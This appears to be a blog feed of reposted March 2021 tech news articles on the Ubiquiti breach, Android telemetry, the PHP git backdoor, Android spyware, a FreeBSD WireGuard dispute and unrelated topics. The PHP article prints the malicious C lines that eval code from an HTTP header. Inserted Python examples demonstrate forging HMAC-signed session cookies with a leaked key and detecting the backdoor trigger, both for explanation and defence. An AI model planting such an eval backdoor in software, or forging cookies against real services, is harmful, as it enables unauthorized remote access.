inchblog

one all world

Ubiquiti breach puts countless cloud-based devices at risk of takeover — March 31, 2021



Network devices maker Ubiquiti has been covering up the severity of a data breach that puts customers’ hardware at risk of unauthorized access, KrebsOnSecurity has reported, citing an unnamed whistleblower inside the company.

In January, the maker of routers, Internet-connected cameras, and other networked devices disclosed what it said was “unauthorized access to certain of our information technology systems hosted by a third-party cloud provider.” The notice said that, while there was no evidence the intruders accessed user data, the company couldn’t rule out the possibility that they obtained users’ names, email addresses, cryptographically hashed passwords, addresses, and phone numbers. Ubiquiti recommended users change their passwords and enable two-factor authentication.

Device passwords stored in the cloud

Tuesday’s report from KrebsOnSecurity cited a security professional at Ubiquiti who helped the company respond to the two-month breach beginning in December 2020. The individual said the breach was much worse than Ubiquiti let on and that executives were minimizing the severity to protect the company’s stock price.

The breach comes as Ubiquiti is pushing—if not outright requiring—cloud-based accounts for users to set up and administer devices running newer firmware versions. An article here says that during the initial setup of a UniFi Dream Machine (a popular router and home gateway appliance), users will be prompted to log in to their cloud-based account or, if they don’t already have one, to create an account.

“You’ll use this username and password to log in locally to the UniFi Network Controller hosted on the UDM, the UDM’s Management Settings UI, or via the UniFi Network Portal (https://network.unifi.ui.com) for Remote Access,” the article goes on to explain. Ubiquiti customers complain about the requirement and the risk it poses to the security of their devices in this thread that followed January’s disclosure.

Forging authentication cookies

According to Adam, the fictitious name that Brian Krebs of KrebsOnSecurity gave the whistleblower, the data that was accessed was much more extensive and sensitive than Ubiquiti portrayed. Krebs wrote:

In reality, Adam said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there.

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Adam says the attacker(s) had access to privileged credentials that were previously stored in the LastPass account of a Ubiquiti IT employee, and gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies.

Such access could have allowed the intruders to remotely authenticate to countless Ubiquiti cloud-based devices around the world. According to its website, Ubiquiti has shipped more than 85 million devices that play a key role in networking infrastructure in over 200 countries and territories worldwide.

Ars Senior Technology Editor Lee Hutchinson reviewed Ubiquiti’s UniFi line of wireless devices in 2015 and again three years later.

In a statement issued after this post went live, Ubiquiti said “nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11.” The full statement is:

As we informed you on January 11, we were the victim of a cybersecurity incident that involved unauthorized access to our IT systems. Given the reporting by Brian Krebs, there is newfound interest and attention in this matter, and we would like to provide our community with more information.

At the outset, please note that nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11. In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems.

These experts identified no evidence that customer information was accessed, or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.

At this point, we have well-developed evidence that the perpetrator is an individual with intricate knowledge of our cloud infrastructure. As we are cooperating with law enforcement in an ongoing investigation, we cannot comment further.

All this said, as a precaution, we still encourage you to change your password if you have not already done so, including on any website where you use the same user ID or password. We also encourage you to enable two-factor authentication on your Ubiquiti accounts if you have not already done so.

At a minimum, people using Ubiquiti devices should change their passwords and enable two-factor authentication if they haven’t already done so. Given the possibility that intruders into Ubiquiti’s network obtained secrets for single sign-on cookies for remote access and signing keys, it’s also a good idea to delete any profiles associated with a device, make sure the device is using the latest firmware, and then recreate profiles with new credentials. As always, remote access should be disabled unless it’s truly needed and is turned on by an experienced user.
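To make concrete why leaked cookie-signing secrets are so serious, and why rotating them and recreating credentials helps, here is an added example (not Ubiquiti’s code; the cookie format, key values and timestamp are constructed for illustration). It implements an HMAC-signed session cookie scheme in which anyone holding the signing key can mint a cookie the service accepts, and shows that the same cookie is rejected as soon as the service stops trusting that key.

```python
# Added example (not Ubiquiti's code): how a leaked signing secret lets anyone mint
# valid single sign-on cookies, and why rotating the secret invalidates them.
import base64
import hashlib
import hmac
import json
from typing import List, Optional

# Constructed secrets standing in for a real SSO signing key and its replacement.
LEAKED_KEY = b"constructed-old-signing-secret-0001"
ROTATED_KEY = b"constructed-new-signing-secret-0002"


def _b64e(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_cookie(claims: dict, key: bytes) -> str:
    """Produce 'body.tag' where tag = HMAC-SHA256(key, body).

    Nothing here is secret except the key: whoever holds it can sign any claims."""
    body = _b64e(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, trusted_keys: List[bytes], now: int) -> Optional[dict]:
    """Return the claims if the tag verifies under a currently trusted key and the
    cookie has not expired; otherwise return None."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    for key in trusted_keys:
        expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
        if hmac.compare_digest(expected, tag):  # constant-time comparison
            try:
                claims = json.loads(_b64d(body))
            except (ValueError, UnicodeDecodeError):
                return None
            if claims.get("exp", 0) <= now:
                return None  # expiry bounds the lifetime of any stolen or forged cookie
            return claims
    return None  # no trusted key produced this tag


def rotation_demo() -> dict:
    """Mint a cookie with the leaked key and check how the service treats it
    before and after the key is rotated out of the trust list."""
    now = 1_617_148_800  # constructed timestamp: 2021-03-31T00:00:00Z
    forged = sign_cookie(
        {"sub": "victim-account", "remote_access": True, "exp": now + 3600}, LEAKED_KEY
    )
    # Flip the last hex digit of the tag to simulate a tampered cookie.
    tampered = forged[:-1] + ("0" if forged[-1] != "0" else "1")
    return {
        "accepted_before_rotation": verify_cookie(forged, [LEAKED_KEY], now) is not None,
        "accepted_after_rotation": verify_cookie(forged, [ROTATED_KEY], now) is not None,
        "tampered_rejected": verify_cookie(tampered, [LEAKED_KEY], now) is None,
        "expired_rejected": verify_cookie(forged, [LEAKED_KEY], now + 7200) is None,
    }


if __name__ == "__main__":
    print(rotation_demo())
```

The defender-side lessons sit in verify_cookie: compare tags in constant time, enforce an expiry so any stolen or forged cookie has a bounded lifetime, and accept only the keys currently in the trust list, so that dropping a compromised key invalidates everything signed with it at once, which is why re-creating profiles after a rotation is the advice that actually closes the door.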

Post updated to add comment from Ubiquiti.

How to achieve smart home nirvana (or, home automation without subscription)


What comes to mind when you think of a smart home? Wi-Fi enabled light bulbs, video doorbells, cloud-connected robot vacuums, or smart fridges perhaps? Brands like Google/Nest or everything enabled with Amazon’s Alexa? While often providing some genuine convenience, these devices are also usually designed to invite and lock users into manufacturers’ ecosystems. Create a cool piece of hardware, you’ll make one sale. Create a cool piece of hardware that extracts recurring monthly service fees for cloud storage or to unlock extra functionality, and you’ll have sales for life.

Compounding our collective frustration, these ecosystems are often incompatible with each other and require multiple different apps for control. Not only are subscriptions and upselling part of the game, the underlying business models for these products are built around planned obsolescence and mining user data.

Luckily, aspirational smart home folks in 2021 have at least one viable alternative: Home Assistant. This piece of open source software is the proverbial ring “that in the darkness binds them.” It is the glue for smart home gear spanning all sorts of manufacturers, from behemoths like Google to minnows like Shelly. It’s a project that has set out to change all of the smart home pitfalls listed above by putting local control, privacy, and interoperability first.

An example of a Home Assistant dashboard used to monitor an RV.

By acting as a single configuration point for multiple ecosystems, Home Assistant is in a uniquely powerful place in the modern smart home. It is aware of the state of every entity in your home and can therefore do useful things like close the garage door if you left it open when you went to bed or left your defined home zone. I will never tire of having the lights automatically fade up one hour before sunset either.

If this sounds too good to be true—all the benefits of a smart home without the downside associated with off-the-shelf solutions—today is the day to see for yourself. Let’s walk through the building blocks required to put together your own self-hosted, subscription-free home automation system. Using the Home Assistant project as a foundation, we’ll cover some must haves for new tech, highlight some of our favorite open source home automation projects, and give you a quick primer on how to put all of it together.

Home Assistant, the basics

Considering the title of this article, this note is a bit awkward. But when you initially choose to build out your smart home with the Home Assistant project, there is an optional $5 per month subscription. This is administered by the company behind the project, Nabu Casa, which was founded in 2018 to ensure the Home Assistant project remained sustainable. For the company, these fees allow Nabu Casa to pay a small number of staff. For you, the $5 per month fee enables your local Home Assistant instance to effortlessly work with popular cloud services like Google Home or Amazon Alexa, and it also permits access to Home Assistant from anywhere with minimal setup. That said, it is definitely possible to mirror both of these functions without the subscription by using a reverse proxy, if you like.

While there are other choices in this space such as Domoticz, OpenHAB, or Gladys, Home Assistant will be our focus today because it’s free, open, and has a *huge* community behind it. At the time of writing, it has over 1,700 integrations with all manner of devices, services, and hardware supported. Plus, it’s a regular feature of GitHub’s trending page, too.

Versatility is the true magic of Home Assistant. In effect, it speaks 1,700 different languages and brings them all into one place. Build a smart home ecosystem with Home Assistant at its core, and devices from completely different ecosystems can finally talk to each other. Would you like the lights to automatically turn off when you turn the kettle on? With Home Assistant, you can do that!

Let’s look at a more realistic example of a useful automation based on this principle. Say you have two sets of lights on totally different circuits that you always want to be in sync, perhaps downstairs and upstairs hallway lighting. With Home Assistant monitoring the state of these entities, it can react and do things automatically. In other words, if light1 is on, then turn on light2.

Time for some key terminology: Home Assistant performs such actions when certain conditions are met or triggers occur. This allows the construction of complex logic such as “turn down the thermostat, ensure doors are locked, and all lights are off when the sun is below the horizon and no motion is detected for one hour or guest mode is not enabled.” Consider how many apps you’d have to open to do all that by yourself: an app for the thermostat, a smart lock, and motion detection via a camera or sensor at least.

Without some Home Assistant glue in the middle, most home devices aren’t really “smart” or “connected.” They are remotely controllable, which is an important prerequisite for being automated, but that should not be conflated with automation.

Automation is your house reacting to the time of day, the weather, your presence, and so on without the need to manually activate the devices every time. With Home Assistant flexing all its muscles, in theory it’s possible to build a home where you shouldn’t need to touch a light switch or a thermostat because your automations are created with enough care and thought.

Android sends 20x more data to Google than iOS sends to Apple, study says — March 30, 2021


A woman under a thick blanket looks at her smartphone.

This post has been updated to report objections researcher Doug Leith had to Google’s critique of his research.

Whether you have an iPhone or an Android device, it’s continuously sending data including your location, phone number, and local network details to Apple or Google. Now, a researcher has provided a side-by-side comparison that suggests that, while both iOS and Android collect handset data around the clock—even when devices are idle, just out of the box, or after users have opted out—the Google mobile OS collects about 20 times as much data as its Apple competitor.

Both iOS and Android, researcher Douglas Leith from Trinity College in Ireland said, transmit telemetry data to their motherships even when a user hasn’t logged in or has explicitly configured privacy settings to opt out of such collection. Both OSes also send data to Apple and Google when a user does simple things such as inserting a SIM card or browsing the handset settings screen. Even when idle, each device connects to its back-end server on average every 4.5 minutes.

Apps and more

It wasn’t just the OSes that sent data to Apple or Google. Pre-installed apps or services also made network connections, even when they hadn’t been opened or used. Whereas iOS automatically sent Apple data from Siri, Safari, and iCloud, Android collected data from Chrome, YouTube, Google Docs, Safetyhub, Google Messenger, the device clock, and the Google search bar.

The table below shows a summary of handset data sent to Apple or Google when the user isn’t logged in:

Table credit: Douglas Leith

Where Android stands out, Leith said, is in the amount of data it collects. At startup, an Android device sends Google about 1MB of data, compared with iOS sending Apple around 42KB. When idle, Android sends roughly 1MB of data to Google every 12 hours, compared with iOS sending Apple about 52KB over the same period. In the US alone, Android collectively gathers about 1.3TB of data every 12 hours. During the same period, iOS collects about 5.8GB.

Google disagrees

Google has contested the findings, saying that they’re based on faulty methods for measuring the data that’s collected by each OS. The company also contended that data collection is a core function of any Internet-connected device.

In a statement, a spokesperson wrote:

We identified flaws in the researcher’s methodology for measuring data volume and disagree with the paper’s claims that an Android device shares 20 times more data than an iPhone. According to our research, these findings are off by an order of magnitude, and we shared our methodology concerns with the researcher before publication.

This research largely outlines how smartphones work. Modern cars regularly send basic data about vehicle components, their safety status and service schedules to car manufacturers, and mobile phones work in very similar ways. This report details those communications, which help ensure that iOS or Android software is up to date, services are working as intended, and that the phone is secure and running efficiently.

On background (meaning Ars isn’t permitted to name or quote the spokesperson), the representative said that it’s inaccurate to say that a user can opt out of all telemetry data collection by the Google OS. The Android Usage and Diagnostics checkbox doesn’t cover telemetry data that Google considers essential for the device to operate normally. Telemetry information collected by the Device Configuration service, for instance, is required for updating and patching the OS.

The spokesperson also challenged the methods the researcher used to measure the amount of data collected by iOS. The experimental setup they used didn’t capture certain types of data, such as UDP/QUIC traffic, which is commonly transmitted by smartphones.

In an email sent after this post went live, Leith said the response “does not accurately characterise the interactions that I’ve had with Google” and in his view was “positively misleading.” He said he contacted Google to ask for a correction. On Friday, the Google spokesperson said the company had no plans to retract the statement. The spokesperson added that the company thinks the majority of Leith’s research is accurate.

An Apple spokesperson also spoke on the condition it be background. The spokesperson said that Apple provides transparency and control for personal information it collects, that the report gets things wrong, that Apple offers privacy protections that prevent Apple from tracking user locations, and that Apple informs users about the collection of location-related data.

Round-the-clock collection

Leith performed his measurements using a Google Pixel 2 running Android 10 and an iPhone 8 running iOS 13.6.1. The iPhone was jailbroken using the checkm8 exploit. The Pixel had Google Play services enabled.

In all, the study, available here, measured the amount of data the devices collected:

  • on first startup following a factory reset
  • when a SIM was inserted or removed
  • when a handset was idle
  • when the settings screen was viewed
  • when location was enabled or disabled
  • when the user logged in to the pre-installed app store

Leith said the data collection by both OSes is concerning because it’s readily linked to a user’s name, email address, payment card data, and possibly to other devices the user has. What’s more, the constant connections to back-end servers necessarily reveal the IP address of the device and, by extension, the general geographic location of the user.

“Currently there are few, if any, realistic options for preventing this data sharing,” Leith wrote.

Post updated to add comment from Apple and later to add follow-up reaction from the researcher and Google.

Nike sues over “Satan Shoe,” disavowing all connection to soul soles


Promotional image shows a man with demonic eyes holding a customized sneaker. The shoes—and the marketing for them—are definitely committed to their aesthetic.

Nike is suing the company behind a viral, limited-edition custom shoe, arguing that the unauthorized custom work dilutes its brand and creates a false impression that Nike approves the controversial design.

The Satan Shoe, a collaboration between a company called MSCHF and rapper Lil Nas X, is a tie-in to the rapper’s new single, “Montero (Call Me By Your Name),” released last Friday. The music video for the song (contains explicit language and extremely unambiguous sexual imagery; do not watch at work or around small children) tells a story “of sin, banishment, and redemption” that ends with Lil Nas X descending into Hell, giving Satan the lap dance of a lifetime, then deposing him and claiming the devil’s horns for his own.

“Montero” proved to be an immediate viral sensation; in five days, it has racked up about 45 million YouTube views, and the song, the singer, and various related terms (“Satan,” “mark of the beast,” “devil,” etc.) have been trending on Twitter and other platforms nonstop for days.

The Satan Shoes differ from the original Nike Air Max 97 shoe due to the addition of a bronze pentagram on the laces, the number “666” and the phrase “Luke 10:18” embroidered on the side, “Lil Nas X” embroidered on the back, a red inverted cross on the top of the tongue, and a mixture of 60 cc of red ink and one drop of human blood injected into the bubble of the sole. MSCHF made only 666 pairs of the shoes, which (despite costing $1,018 each) sold out in minutes.

Nike argues in its suit (PDF) that it had nothing to do with these shoes, but MSCHF has created brand confusion leading customers to think Nike is somehow involved. “Nike files this lawsuit to maintain control of its brand, to protect its intellectual property, and to clear the confusion and dilution in the marketplace by setting the record straight,” the suit reads. “Nike has not and does not approve or authorize MSCHF’s customized Satan Shoes.” The company asks the court to stop MSCHF from fulfilling any orders for the shoes.

How is this shoe different from any other shoe?

People sell customized sneakers all the time. The Internet is chock-full of individual sellers slinging custom Nikes, as well as any number of websites specializing in them.

US law, broadly speaking, tends to be pretty forgiving of doing whatever the hell you want with a thing after you have legally purchased that thing. In intellectual property law, there’s a legal principle called the first-sale doctrine. At a high level, the first-sale doctrine basically means that someone loses their intellectual property rights over what is done with a thing they have sold at the time they sell it and that the new owner then gets to decide what to do with it. There are, of course, exceptions, but generally if I spend my own money legally to acquire something—a book, a shoe, a designer bag—I can modify it however I want and then sell it to whomever I want for whatever price that person is willing to pay. There is a similar principle, called patent exhaustion, that applies to goods that are patented rather than copyrighted.

Nike, however, is specifically alleging brand confusion and trademark infringement. In short, the company says its swoop (sorry, “SWOOP”) is world-famous, and by leaving it on the shoe, MSCHF is deliberately confusing consumers into thinking Nike has something to do with the product. “MSCHF’s wrongful use of the Nike Asserted Marks is likely to cause dilution by blurring and the whittling away of the distinctiveness and fame” of Nike’s visual trademarks, the suit argues. “Unless restrained, MSCHF will continue to use the Nike Asserted Marks and/or confusingly similar marks and will cause irreparable damage to Nike for which Nike has no adequate remedy” other than the lawsuit.

Nike is clearly right that the Satan Shoes and associated video are deliberately and intentionally provocative, and they are indeed drawing predictable ire from certain conservative Christian corners. South Dakota Gov. Kristi Noem, for example, shared the Twitter announcement of the Satan Shoe with the caption, “We are in a fight for the soul of our nation. We need to fight hard. And we need to fight smart. We have to win.”

The suit includes several online comments from consumers claiming they are going to boycott Nike over the Satan Shoe. “Words cannot describe the amount of disgust and disbelief that this is truly happening,” one user going by “Michelle” wrote. “Jesus please save us!!!! Never supporting or buying Nike again!!!!”

“Nike has no control over the nature and quality of the Satan Shoes,” the company concludes, “and MSCHF’s keeping the Nike name on them is reflecting negatively on the company, its reputations, and the quality and safety of its goods.”

Huge success

Whether or not a single pair of shoes gets into the hands of any buyer now seems to be beside the point; clearly MSCHF has gotten all the attention it could possibly desire.

Brooklyn-based MSCHF—i.e., mischief—specializes in viral absurdity. That’s its entire jam, company CEO Gabriel Whaley recently explained to Business Insider.

“We’re trying to do stuff that the world can’t even define,” Whaley said. “Our perspective is everything is funny in a nihilistic sort of way. We’re not here to make the world a better place… We just do shit, and people buy our stuff.”

Lil Nas X himself is likewise clearly enjoying and leaning into the controversy online, as he is known to do. Over the weekend he posted a YouTube video called “Lil Nas X Apologizes for Satan Shoe,” in which he briefly holds up a shoe before the video cuts to the sex-with-Satan part of the “Montero” video.

The singer also posted a Tweet late Sunday with a mock-up of a white version of the Nike shoe, featuring Chick-fil-A branding in place of the iconic swoop and an allusion to John 3:16. “[W]e have decided to drop these to even the score,” he wrote. “[D]amn y’all happy now?”

Hackers backdoor PHP source code after breaching internal git server — March 29, 2021



A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave that code-injection capability to any visitor who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes were brought to public attention no later than Sunday night by developers including Markus Staab, Jake Birchall, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.

Both commits added the same lines of code:

	convert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
		} zend_end_try();
	}
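As an added example (not code from the PHP project or from the attackers), the following Python check applies the trigger logic of the commit above from the defender’s side: it parses raw HTTP requests, flags any header whose value contains the string the backdoor looked for, and returns the part of the value that a backdoored build would have passed to the evaluator (the value from byte 8 onward) so an analyst can triage it. The sample requests and host name are constructed.

```python
# Added example (not PHP project code): flag inbound HTTP requests carrying the
# trigger string that the malicious commits looked for in a header value.
from typing import Dict, List, Tuple

TRIGGER = "zerodium"  # the trigger string from the malicious commits
# The backdoor called zend_eval_string(Z_STRVAL_P(enc)+8, ...), i.e. it evaluated the
# header value starting at byte 8 (len("zerodium")) whenever the trigger appeared anywhere.
EVAL_OFFSET = 8


def parse_request_headers(raw_request: str) -> Dict[str, str]:
    """Parse the header block of a raw HTTP/1.1 request into a lower-cased name -> value map.

    Header names are case-insensitive per the HTTP spec; repeated headers are joined
    with a comma, which is how a server would normally combine them."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed header line; ignore it
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def find_trigger_headers(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (header_name, would_be_evaluated_tail) for every header containing the trigger.

    The match is case-sensitive, mirroring strstr() in the malicious commit. The tail is
    the value from EVAL_OFFSET onward, returned for analyst triage only."""
    hits = []
    for name, value in headers.items():
        if TRIGGER in value:
            hits.append((name, value[EVAL_OFFSET:]))
    return hits


def scan_requests(raw_requests: List[str]) -> List[Tuple[int, str, str]]:
    """Scan raw requests and return (request_index, header_name, tail) for each hit."""
    findings = []
    for i, raw in enumerate(raw_requests):
        for name, tail in find_trigger_headers(parse_request_headers(raw)):
            findings.append((i, name, tail))
    return findings


# Constructed sample traffic: two ordinary requests and one probing request.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: www.example.test\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: www.example.test\r\nUser-Agent: curl/7.68.0\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: www.example.test\r\n"
    "User-Agent: zerodium-probe-from-constructed-sample\r\n\r\n",
]

if __name__ == "__main__":
    for idx, name, tail in scan_requests(SAMPLE_REQUESTS):
        print(f"request #{idx}: trigger in header '{name}', evaluated tail would be {tail!r}")
```

Because the trigger could sit in any header, the check walks every header rather than only User-Agent, and because the evaluator ignored where in the value the trigger appeared, the reported tail is always the value from byte 8, which is exactly what a site running the backdoored build would have executed.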

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.”

Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted to brag about their unauthorized access to the PHP Git server rather than by those trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”

The massive cargo ship that blocked the Suez Canal is now moving again


After nearly a week of blocking one of the world’s most important maritime shortcuts, the massive Ever Given cargo ship is now free and on the move. “I am excited to announce that our team of experts, working in close collaboration with the Suez Canal Authority, successfully refloated the Ever Given on 29 March at 15:05 hrs local time, thereby making free passage through the Suez Canal possible again,” said Peter Berdowski, CEO of the salvage company Boskalis.

Owned by shipping company Evergreen, the 400-meter-long Ever Given is one of the longest ships ever built, dwarfing even the biggest nuclear aircraft carriers. The ship was caught in a storm on March 23 while transiting the Suez Canal, where a combination of high winds and the ship’s massive sail area turned it diagonally. At that point, the Ever Given ran aground and completely blocked the 152-year-old canal, which is less than a meter deep in many places outside of a dredged navigation channel.

The blockage—easily seen by space-based sensors—then started holding up hundreds of other ships trying to transit between the Red Sea and the Mediterranean.

For several days, workers on the ground in Egypt had tried to free the Ever Given from the bank of the canal, digging out the ship’s large, bulbous prow from the sand. Over the weekend, dredgers also went to work on the narrow section of the canal (under the front half of the Ever Given), moving tens of thousands of tons of mud in an attempt to free the big boat from its bondage.

Finally, on Monday, a combination of at least 14 tug boats and a high tide started making real progress, refloating the Ever Given and then, eventually, getting it moving again.

New Android malware with full range of spying capabilities has been found — March 26, 2021


Researchers have discovered a new advanced piece of Android malware that finds sensitive information stored on infected devices and sends it to attacker-controlled servers.

The app disguises itself as a system update that must be downloaded from a third-party store, researchers from security firm Zimperium said on Friday. In fact, it’s a remote-access trojan that receives and executes commands from a command-and-control server. It provides a full-featured spying platform that performs a wide range of malicious activities.

Soup to nuts

Zimperium listed the following capabilities:

  • Stealing instant messenger messages
  • Stealing instant messenger database files (if root is available)
  • Inspecting the default browser’s bookmarks and searches
  • Inspecting the bookmark and search history from Google Chrome, Mozilla Firefox, and Samsung Internet Browser
  • Searching for files with specific extensions (including .pdf, .doc, .docx, .xls, and .xlsx)
  • Inspecting the clipboard data
  • Inspecting the content of the notifications
  • Recording audio
  • Recording phone calls
  • Periodically taking pictures (through either the front or back camera)
  • Listing the installed applications
  • Stealing images and videos
  • Monitoring the GPS location
  • Stealing SMS messages
  • Stealing phone contacts
  • Stealing call logs
  • Exfiltrating device information (e.g., installed applications, device name, storage stats)
  • Concealing its presence by hiding the icon from the device’s drawer/menu

Messaging apps that are vulnerable to the database theft include WhatsApp, which billions of people use, often with the expectation that it provides greater confidentiality than other messengers. As noted, the databases can be accessed only if the malware has root access to the infected device. Hackers are able to root infected devices when they run older versions of Android.

If the malicious app doesn’t acquire root, it can still collect conversations and message details from WhatsApp by tricking users into enabling Android accessibility services. Accessibility services are controls built into the OS that make it easier for users with vision impairments or other disabilities to use devices by, for instance, modifying the display or having the device provide spoken feedback. Once accessibility services are enabled, the malicious app can scrape the content on the WhatsApp screen.

Another capability is stealing files stored in a device’s external storage. To reduce bandwidth consumption that could tip off a victim that a device is infected, the malicious app steals image thumbnails, which are much smaller than the images they correspond to. When a device is connected to Wi-Fi, the malware sends stolen data from all folders to the attackers. When only a mobile connection is available, the malware sends a more limited set of data.

As full-featured as the spying platform is, it suffers from a key limitation—namely, the inability to infect devices without first tricking users into making decisions that more experienced people know aren’t safe. First, users must download the app from a third-party source. As problematic as Google’s Play Store is, it’s generally a more trustworthy place to get apps. Users must also be socially engineered into enabling accessibility services for some of the advanced features to work.

Google declined to comment except to reiterate that the malware was never available in Play.

Buffer overruns, license violations, and bad code: FreeBSD 13’s close call —

Buffer overruns, license violations, and bad code: FreeBSD 13’s close call


At first glance, Matthew Macy seemed like a perfectly reasonable choice to port WireGuard into the FreeBSD kernel. WireGuard is an encrypted point-to-point tunneling protocol, part of what most people think of as a “VPN.” FreeBSD is a Unix-like operating system that powers everything from Cisco and Juniper routers to Netflix’s network stack, and Macy had plenty of experience on its dev team, including work on multiple network drivers.

So when Jim Thompson, the CEO of Netgate, which makes FreeBSD-powered routers, decided it was time for FreeBSD to enjoy the same level of in-kernel WireGuard support that Linux does, he reached out to offer Macy a contract. Macy would port WireGuard into the FreeBSD kernel, where Netgate could then use it in the company’s popular pfSense router distribution. The contract was offered without deadlines or milestones; Macy was simply to get the job done on his own schedule.

With Macy’s level of experience—with kernel coding and network stacks in particular—the project looked like a slam dunk. But things went awry almost immediately. WireGuard founding developer Jason Donenfeld didn’t hear about the project until it surfaced on a FreeBSD mailing list, and Macy didn’t seem interested in Donenfeld’s assistance when offered. After roughly nine months of part-time development, Macy committed his port—largely unreviewed and inadequately tested—directly into the HEAD section of FreeBSD’s code repository, where it was scheduled for incorporation into FreeBSD 13.0-RELEASE.

This unexpected commit raised the stakes for Donenfeld, whose project would ultimately be judged on the quality of any production release under the WireGuard name. Donenfeld identified numerous problems with Macy’s code, but rather than object to the port’s release, Donenfeld decided to fix the issues. He collaborated with FreeBSD developer Kyle Evans and with Matt Dunwoodie, an OpenBSD developer who had worked on WireGuard for that operating system. The three replaced almost all of Macy’s code in a mad week-long sprint.

This went over very poorly with Netgate, which sponsored Macy’s work. Netgate had already taken Macy’s beta code from a FreeBSD 13 release candidate and placed it into production in pfSense’s 2.5.0 release. The forklift upgrade performed by Donenfeld and collaborators—along with Donenfeld’s sharp characterization of Macy’s code—presented the company with a serious PR problem.

Netgate’s public response included accusations of “irrational bias against mmacy and Netgate” and irresponsible disclosure of “a number of zero-day exploits”—despite Netgate’s near-simultaneous declaration that no actual vulnerabilities existed.

This combative response from Netgate drew increased scrutiny from many sources, which uncovered surprising elements of Macy’s own past. He and his wife Nicole had been arrested in 2008 after two years spent attempting to illegally evict tenants from a small San Francisco apartment building the pair had bought.

The Macys’ attempts to force their tenants out included sawing through floor support joists to make the building unfit for human habitation, sawing holes directly through the floors of tenants’ apartments, and forging extremely threatening emails appearing to be from the tenants themselves. The couple fled to Italy to avoid prosecution but were eventually extradited back to the US—where they pled guilty to a reduced set of felonies and served four years and four months each.

Macy’s history as a landlord, unsurprisingly, dogged him professionally—which contributed to his own lack of attention to the doomed WireGuard port.

“I didn’t even want to do this work,” Macy eventually told us. “I was burned out, spent many months with post-COVID syndrome… I’d suffered through years of verbal abuse from non-doers and semi-non-doers in the project whose one big one up on me is that they aren’t felons. I jumped at the opportunity to leave the project in December… I just felt a moral obligation to get [the WireGuard port] over the finish line. So you’ll have to forgive me if my final efforts were a bit half-hearted.”

